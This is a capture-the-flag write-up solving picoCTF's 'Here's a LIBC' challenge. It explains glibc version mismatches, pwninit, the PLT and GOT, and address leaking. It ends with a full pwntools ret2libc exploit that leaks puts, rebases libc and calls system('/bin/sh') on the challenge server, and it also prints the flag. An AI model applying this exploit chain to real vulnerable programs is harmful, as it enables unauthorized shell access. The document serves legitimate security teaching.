Here's a LIBC

In this writeup, I explain my solution to the picoCTF Here’s a LIBC challenge.

As the title suggests, this is a ret2libc problem.

I’ll also cover libc, pwninit, the PLT and GOT, leaking addresses, Python generators, and a few other topics.

Here’s a libc

file + checksec

They gave us a 64-bit ELF.

file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e5dba3e6ed29e457cd104accb279e127285eecd0, not stripped

Here’s the checksec result.

checksec vuln
[*] "/picoctf/Here's_a_libc/vuln"
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    RUNPATH:    b'./'
    Stripped:   No

The source code isn’t provided this time.

I tried executing the file but it didn’t run.

./vuln
Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion `sym != NULL' failed!

That’s a problem.

libc

Anyway, what exactly is libc?

libc is the C standard library.

The functions we use a lot in C, such as printf, scanf, read… are all defined there.

There are several implementations of libc (glibc, musl…).

On Linux, though, when people say libc they usually mean glibc.

As you can see, glibc has a g prefix, just like GCC.

The g stands for GNU, which is itself a recursive acronym for 'GNU's Not Unix'.

Long story short, GCC is used to build the executable (ELF), and glibc is the runtime library the ELF relies on to work.

There are many versions of glibc; a new version is released roughly twice a year.

We were also given a libc.so.6.

What is libc.so.6 ?

libc.so.6 is the name programs use to load the glibc shared library on Linux. On many systems it’s a symbolic link to the versioned library file.

Let’s check which version of libc it uses.

It’s glibc 2.27.

strings libc.so.6 | grep "GNU" 
GNU C Library (Ubuntu glibc 2.27-3ubuntu1.2) stable release version 2.27.
Compiled by GNU CC version 7.5.0.

Now that we know which version of libc picoCTF uses, we need to check which version we’re using.

Run ldd on your *nix machine.

It’ll tell you which version of glibc you’re using.

ldd --version
ldd (Ubuntu glibc 2.39-0ubuntu8.5) 2.39
Copyright (C) 2024 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.

I’m using 2.39.

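We probably couldn’t run the ELF file because of a glibc version mismatch.

The RUNPATH of ./ makes the binary load the provided libc.so.6 (2.27) from the current directory, while the interpreter is still my system’s ld.so from the much newer glibc 2.39.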

Let’s check which Ubuntu version the vuln file was built on.

You can use strings and grep to find the compiler and the Linux distribution the ELF was built with.

strings vuln | grep "GCC:"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0

It looks like it’s Ubuntu 18.04.

Why did I check where the ELF file was built?

Well, if I know the Ubuntu version, I’ll probably know the libc version as well.

Ubuntu 18.04 uses glibc 2.27.

The simplest way to solve the glibc version mismatch issue is to get a hold of Ubuntu 18.04, because it uses glibc 2.27.

People usually use Docker to get their hands on different versions of Ubuntu.

If it’s your first time solving this kind of problem and you don’t know what glibc is, I don’t recommend using Dockerfiles.

You’ll be overloaded with information about Docker and Dockerfiles.

You’d also have to learn Docker and Dockerfiles separately, which takes time.

However, the next time you solve a pwn challenge that requires a different glibc version, use Dockerfiles.

It’s more convenient than the approach I’m introducing here.

pwninit

I’ll be using pwninit for this writeup.

pwninit is written in Rust so you’ll have to install Rust first.

You also might have to pass the --locked flag when installing pwninit.

Otherwise it might not get installed.

Add the cargo bin to your PATH.

export PATH=$PATH:/home/your_name/.cargo/bin

You need to install patchelf.

sudo apt-get install patchelf

Then run pwninit in the directory where the vuln executable lives.

pwninit
bin: ./vuln
libc: ./libc.so.6
ld: ./ld-2.27.so

unstripping libc
https://launchpad.net/ubuntu/+archive/primary/+files//libc6-dbg_2.27-3ubuntu1.2_amd64.deb
warning: failed unstripping libc: failed running eu-unstrip, please install elfutils: No such file or directory (os error 2)
copying ./vuln to ./vuln_patched
running patchelf on ./vuln_patched
writing solve.py stub

Let’s run vuln_patched.

Now it runs smoothly.

./vuln_patched 
WeLcOmE To mY EcHo sErVeR!
hwkim301
HwKiM301
^C

Exploit Explanation

Let’s check the file in IDA or Ghidra.

Here’s the main function.

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
  void *v3; // rsp
  char v4; // al
  char *v5; // rdi
  const char **v6; // [rsp+0h] [rbp-80h] BYREF
  int v7; // [rsp+Ch] [rbp-74h]
  char v8[40]; // [rsp+10h] [rbp-70h] BYREF
  char *s; // [rsp+38h] [rbp-48h]
  __int64 v10; // [rsp+40h] [rbp-40h]
  unsigned __int64 v11; // [rsp+48h] [rbp-38h]
  __gid_t rgid; // [rsp+54h] [rbp-2Ch]
  unsigned __int64 i; // [rsp+58h] [rbp-28h]

  v7 = argc;
  v6 = argv;
  setbuf(_bss_start, 0);
  rgid = getegid();
  setresgid(rgid, rgid, rgid);
  v11 = 27;
  strcpy(v8, "Welcome to my echo server!");
  v10 = 26;
  v3 = alloca(32);
  s = (char *)&v6;
  for ( i = 0; i < v11; ++i )
  {
    v4 = convert_case(v8[i], i);
    s[i] = v4;
  }
  v5 = s;
  puts(s);
  while ( 1 )
    do_stuff(v5);
}

The convert_case function.

__int64 __fastcall convert_case(char a1, char a2)
{
  if ( a1 <= '`' || a1 > 122 )
  {
    if ( a1 <= 64 || a1 > 90 )
    {
      return (unsigned __int8)a1;
    }
    else if ( (a2 & 1) != 0 )
    {
      return (unsigned int)(unsigned __int8)a1 + 32;
    }
    else
    {
      return (unsigned __int8)a1;
    }
  }
  else if ( (a2 & 1) != 0 )
  {
    return (unsigned __int8)a1;
  }
  else
  {
    return (unsigned int)(unsigned __int8)a1 - 32;
  }
}

The program takes a string as input, uppercases the letters at even indices, and lowercases the letters at odd indices.

For example, only 'h', 'k', 'm' were converted in 'hwkim301'.
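To double-check my reading of the decompiled code, here is a small Python port of convert_case. It’s my own re-implementation (the echo helper is a name I made up), not code from the binary, and it converts the whole string, whereas do_stuff only converts the first 100 bytes.

```python
def convert_case(ch: str, index: int) -> str:
    """Python port of the decompiled convert_case (a sketch, not the original source)."""
    if 'a' <= ch <= 'z':
        # Lowercase letters are uppercased at even indices only.
        return ch if index & 1 else ch.upper()
    if 'A' <= ch <= 'Z':
        # Uppercase letters are lowercased at odd indices only.
        return ch.lower() if index & 1 else ch
    # Digits, spaces and punctuation are returned unchanged.
    return ch


def echo(line: str) -> str:
    """Hypothetical helper: apply convert_case to every character of the line."""
    return ''.join(convert_case(c, i) for i, c in enumerate(line))


print(echo('hwkim301'))                    # HwKiM301
print(echo('Welcome to my echo server!'))  # WeLcOmE To mY EcHo sErVeR!
```

Both outputs match what vuln_patched printed earlier.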

The do_stuff function.

int do_stuff()
{
  char v0; // al
  char v2; // [rsp+Fh] [rbp-81h] BYREF
  char s[112]; // [rsp+10h] [rbp-80h] BYREF
  __int64 v4; // [rsp+80h] [rbp-10h]
  unsigned __int64 i; // [rsp+88h] [rbp-8h]

  v4 = 0;
  __isoc99_scanf("%[^\n]", s);
  __isoc99_scanf("%c", &v2);
  for ( i = 0; i <= 0x63; ++i )
  {
    v0 = convert_case(s[i], i);
    s[i] = v0;
  }
  return puts(s);
}

The %[^\n] conversion has no field width, so this scanf behaves like gets: it keeps reading until it sees a newline, no matter how small the buffer is.

That gives us a buffer overflow (BOF) on s.

__isoc99_scanf("%[^\n]", s);

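It should be fixed by adding a field width that leaves room for the terminating null byte.

scanf("%111[^\n]", s);

The input buffer starts at rbp-0x80, as the decompiler comment shows.

With a standard stack frame, the saved rbp is at rbp and the return address is at rbp+8.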

char s[112]; // [rsp+10h] [rbp-80h] BYREF

Therefore the offset from the input buffer to the return address is (rbp+8) - (rbp-0x80) = 0x88 = 136 bytes.
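The same arithmetic as a tiny Python sketch. The constant names are mine; the offsets come from the decompiler comments in do_stuff.

```python
# Stack slots are written relative to rbp, as in the decompiler comments.
BUF_OFFSET = -0x80   # char s[112] lives at [rbp-80h]
RET_OFFSET = 0x8     # the return address sits just above the saved rbp, at [rbp+8]

padding = RET_OFFSET - BUF_OFFSET
print(hex(padding), padding)  # 0x88 136

# 112 bytes of s, 16 bytes for v4 and i, 8 bytes of saved rbp.
assert padding == 112 + 16 + 8
```

So 136 bytes of padding put the next 8 bytes we send right on top of the return address.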

Now we are able to overwrite the return address.

The problem is that the binary itself never calls system or execve, so nothing in it spawns a shell for us.

We need to do three things in order to get a shell.

First, we need to find the libc base address.

Then, we need to return to the main function, so that we can trigger the BOF a second time and use the leaked libc base.

Finally, we need to call system('/bin/sh') to pop a shell.

The libc base address is the memory address where libc is mapped in the process.

Even though the program doesn’t call system or execve, libc is loaded into the process and has a whole bunch of functions defined. If we know the libc base address and the offset of system, we can call system('/bin/sh').

To do that we’ll have to use the GOT and PLT.

They’re both used in dynamically linked ELF files.

Dynamic linking is the default linking for ELF files so we won’t have to overthink whether GOT and PLT exist or not.

GOT & PLT

GOT (Global Offset Table)

The GOT is a table in the binary that stores the actual addresses of functions in shared libraries (like libc) at runtime.

When a function like puts is called, the program looks up its real address in the GOT.

PLT (Procedure Linkage Table)

The PLT is a set of stubs (small pieces of code) in the binary that jump to the addresses in the GOT.

When you call puts@plt, it uses the GOT to find where puts is in libc and jumps there.

You can use the PLT to call functions (like puts@plt) even if you don’t know their real addresses.

You can leak addresses from the GOT (like puts@got) to find the libc base address.

Once you have the libc base, you can calculate the address of any function in libc (like system or execve) and use it in your exploit.

Although the libc base changes every time, the offsets to the functions don’t.

Dynamic linking allows programs to use shared libraries (like libc) without knowing their exact memory addresses at compile time.

When a program calls a library function (like puts), it doesn’t know where that function will be in memory after the program is loaded.

When you call a function like puts, the call goes to puts@plt.

If it’s the first time calling the function, the PLT code asks the dynamic linker to find the real address of puts and stores it in the GOT.

After the first call, the PLT uses the address stored in the GOT to call the function directly (no more lookup needed).
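Here is a toy Python model of that lazy lookup. It is only a sketch: ToyProcess, its methods, and every address in it are made up for illustration, and a real GOT slot initially points back into the PLT stub rather than being empty.

```python
class ToyProcess:
    """Toy model of lazy binding. Every name and address here is made up."""

    def __init__(self, libc_base, libc_offsets):
        self.libc_base = libc_base
        self.libc_offsets = libc_offsets
        self.got = {}      # symbol -> resolved address
        self.lookups = 0   # how many times the "dynamic linker" ran

    def _resolve(self, symbol):
        # Stand-in for the dynamic linker: base + offset inside libc.
        self.lookups += 1
        return self.libc_base + self.libc_offsets[symbol]

    def call_via_plt(self, symbol):
        # First call: the GOT slot is not filled in yet, so resolve and cache it.
        if symbol not in self.got:
            self.got[symbol] = self._resolve(symbol)
        # Later calls: jump straight to the cached address.
        return self.got[symbol]


proc = ToyProcess(libc_base=0x7f0000000000, libc_offsets={'puts': 0x1000})
first = proc.call_via_plt('puts')
second = proc.call_via_plt('puts')
print(hex(first), proc.lookups)  # 0x7f0000001000 1
```

The second call returns the same address without another lookup, which is why reading the GOT entry after puts has been called once gives us a real libc address.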

1. Overwrite the return address

2. Set rdi to puts@got.

puts@got is the GOT entry that holds the runtime address of puts.

We return to a pop rdi; ret gadget, which pops puts@got from our payload into rdi, the register that holds the first argument.

3. Use puts@plt

Since rdi holds puts@got, puts() is called with puts@got as its argument.

puts therefore prints the bytes stored at puts@got, which is the actual memory address of puts in libc.

I used puts because, unlike other functions such as setbuf or read, it actually prints output to the screen, making it easier to capture the leaked address.

4. Then we get back to main.

We need to go back to main because it calls do_stuff, the only vulnerable function, and we need to overflow it a second time.
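Steps 1 to 4 can be laid out byte by byte as in the sketch below. It uses only the standard library, so p64 here is my own helper that mimics pwntools’ p64, and the four addresses are illustrative placeholders (assumptions), not values taken from this writeup. Read the real ones from the binary.

```python
import struct


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian integer (same idea as pwntools' p64)."""
    return struct.pack('<Q', value)


# Placeholder addresses for illustration only; read the real ones from the binary.
POP_RDI_RET = 0x400913
PUTS_GOT = 0x601018
PUTS_PLT = 0x400540
MAIN = 0x400771

stage1 = b'A' * 136          # padding up to the saved return address
stage1 += p64(POP_RDI_RET)   # step 1: overwrite the return address with the gadget
stage1 += p64(PUTS_GOT)      # step 2: value popped into rdi
stage1 += p64(PUTS_PLT)      # step 3: puts(puts@got) prints the libc address
stage1 += p64(MAIN)          # step 4: restart the program for the second overflow

# scanf("%[^\n]") stops at a newline, so the payload must not contain one.
assert b'\n' not in stage1
print(len(stage1))  # 168
```

Each chain entry is 8 bytes, so the payload is 136 + 4 * 8 = 168 bytes long.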

5. Find the leaked libc address in the output.

Set a breakpoint in gdb and run vmmap.

You’ll see that the libc addresses all start with 0x7f…

0x00007ffff79e4000 0x00007ffff7bcb000 0x0000000000000000 r-x /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7bcb000 0x00007ffff7dcb000 0x00000000001e7000 --- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dcb000 0x00007ffff7dcf000 0x00000000001e7000 r-- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dcf000 0x00007ffff7dd1000 0x00000000001eb000 rw- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dd1000 0x00007ffff7dd5000 0x0000000000000000 rw-

Here are the last couple of bytes after sending the payload.

b'\nAa...Ad\n0Z\x96\xfbG\x7f'

puts stops at the first null byte, so it doesn’t print the full 8 bytes of a 64-bit address whose high bytes are null (\x00).

Addresses are stored in little-endian order, so an address like 0x00007fabcdef1234 sits in memory as \x34\x12\xef\xcd\xab\x7f\x00\x00, and puts prints \x34\x12\xef\xcd\xab\x7f.

By reading until \x7f and taking the last 6 bytes, we capture the non-null bytes of the leaked 64-bit address, assuming the top two bytes are 0x0000.

This is a common heuristic.

Since u64 expects exactly 8 bytes, we pad the value to 8 bytes using ljust.

Filling it up with null bytes is enough, because the missing high bytes are zero.

leak=u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
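To see what that one-liner does, here is the same decoding with only the standard library, applied to the tail of the output quoted above. struct.unpack('<Q', ...) plays the role of pwntools’ u64, and the variable names are mine.

```python
import struct

# Tail of the received data quoted above (the elided middle is left out).
received_tail = b'Ad\n0Z\x96\xfbG\x7f'

raw = received_tail[-6:]                # the six non-null bytes of the pointer
padded = raw.ljust(8, b'\x00')          # restore the two high null bytes
leak = struct.unpack('<Q', padded)[0]   # little-endian decode, like u64

print(hex(leak))  # 0x7f47fb965a30
```

The printable bytes 0, Z and G are simply 0x30, 0x5a and 0x47, which is why the leak looks like text mixed with escapes.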

6. Find the libc base

Now that we know the memory address of puts, we can calculate the libc base by subtracting its offset.

libc.address=leak-libc.symbols['puts']
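As a worked example, here is the subtraction for the leak quoted above. PUTS_OFFSET is an assumed value for this libc build, so confirm it with libc.symbols['puts'] before relying on it.

```python
leak = 0x7f47fb965a30   # runtime address of puts, decoded from the output quoted above
PUTS_OFFSET = 0x80a30   # assumed offset of puts in this libc; confirm with libc.symbols['puts']

libc_base = leak - PUTS_OFFSET
print(hex(libc_base))  # 0x7f47fb8e5000

# Shared libraries are mapped at page boundaries, so the low 12 bits must be zero.
assert libc_base & 0xfff == 0
```

A base that isn’t page-aligned usually means the leak or the offset is wrong. Once libc.address is set, pwntools returns rebased (absolute) addresses from libc.symbols and libc.search.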

7. Call system('/bin/sh') using the system function in libc.

Overwrite the return address again, and set rdi to the address of the '/bin/sh' string using the pop rdi; ret gadget.

Then return into the system function in libc.

ELF.search is used to search strings in an ELF or libc file.

Since it returns a generator, we can use next to grab the values it returns.

What’s a generator?

A generator in Python is a special type of iterator that allows you to create an iterable sequence of values on the fly, without storing the entire sequence in memory at once.
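Here is a minimal generator that behaves a bit like ELF.search. The search function and the blob bytes are hypothetical stand-ins I wrote for illustration, not pwntools code or real libc contents.

```python
from typing import Iterator


def search(data: bytes, needle: bytes) -> Iterator[int]:
    """Lazily yield every offset of needle in data (hypothetical helper)."""
    start = 0
    while True:
        index = data.find(needle, start)
        if index == -1:
            return        # no more matches: the generator is exhausted
        yield index       # pause here until the caller asks for the next match
        start = index + 1


blob = b'\x00/bin/sh\x00padding\x00/bin/sh\x00'   # made-up stand-in for libc's bytes
matches = search(blob, b'/bin/sh')

first = next(matches)   # runs the generator only up to the first yield
print(first)            # 1
print(next(matches))    # 17
```

Calling next once is enough for the exploit, because any occurrence of '/bin/sh' works as the argument to system.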

The stack needs to be 16-byte aligned when system is called. I explained why it has to be aligned in the guessing_game writeup.

To make it 16-byte aligned, I added a ret gadget before the call to system.

payload2=b'A'*136
payload2+=p64(pop_rdi)
payload2+=p64(next(libc.search(b'/bin/sh')))
payload2+=p64(vuln_rop.find_gadget(['ret']).address)
payload2+=p64(libc.symbols['system'])
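The effect of the extra ret can be checked with a little arithmetic. This is a sketch under two assumptions: do_stuff was reached through a normal call, so its saved return address sits at an address ending in 8, and RET_SLOT is a made-up stack address of which only the low 4 bits matter.

```python
def rsp_at_entry(ret_slot: int, chain_words: int) -> int:
    """rsp when the last address in the chain starts executing.

    Each 8-byte chain entry (gadget address or popped value) moves rsp up by 8.
    """
    return ret_slot + 8 * chain_words


# Hypothetical address of do_stuff's saved return address.
RET_SLOT = 0x7ffc00001008

without_ret = rsp_at_entry(RET_SLOT, 3)   # pop rdi; '/bin/sh'; system
with_ret = rsp_at_entry(RET_SLOT, 4)      # pop rdi; '/bin/sh'; ret; system

# The System V ABI expects rsp % 16 == 8 on function entry.
print(without_ret % 16)  # 0
print(with_ret % 16)     # 8
```

Without the ret, system starts with rsp 8 bytes off from what it expects; the single ret shifts rsp by one slot and restores the expected alignment.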

Exploit Code

from pwn import *

r = remote('mercury.picoctf.net', 1774)
e = ELF('./vuln')
libc = ELF('./libc.so.6')
vuln_rop = ROP(e)

# Gadget and addresses from the binary (fixed, because PIE is disabled)
pop_rdi = vuln_rop.find_gadget(['pop rdi', 'ret']).address
puts_plt = e.plt['puts']
puts_got = e.got['puts']
main = e.symbols['main']

# Stage 1: call puts(puts@got) to leak a libc address, then return to main
payload = b'A' * 136
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendlineafter(b'WeLcOmE To mY EcHo sErVeR!', payload)
# The leaked pointer ends with 0x7f; pad its 6 bytes back to 8 for u64
leak = u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.info(f'puts leak: {hex(leak)}')

# Rebase libc so that symbols and search results become absolute addresses
libc.address = leak - libc.symbols['puts']
log.info(f'libc base: {hex(libc.address)}')

# Stage 2: system('/bin/sh'), with an extra ret to keep the stack 16-byte aligned
payload2 = b'A' * 136
payload2 += p64(pop_rdi)
payload2 += p64(next(libc.search(b'/bin/sh')))
payload2 += p64(vuln_rop.find_gadget(['ret']).address)
payload2 += p64(libc.symbols['system'])
r.sendline(payload2)

r.interactive()
# picoCTF{1_<3_sm4sh_st4cking_f2ac531bbb3a68ed}

Reference Writeup

My favorite write up is this one. It’s pretty detailed.
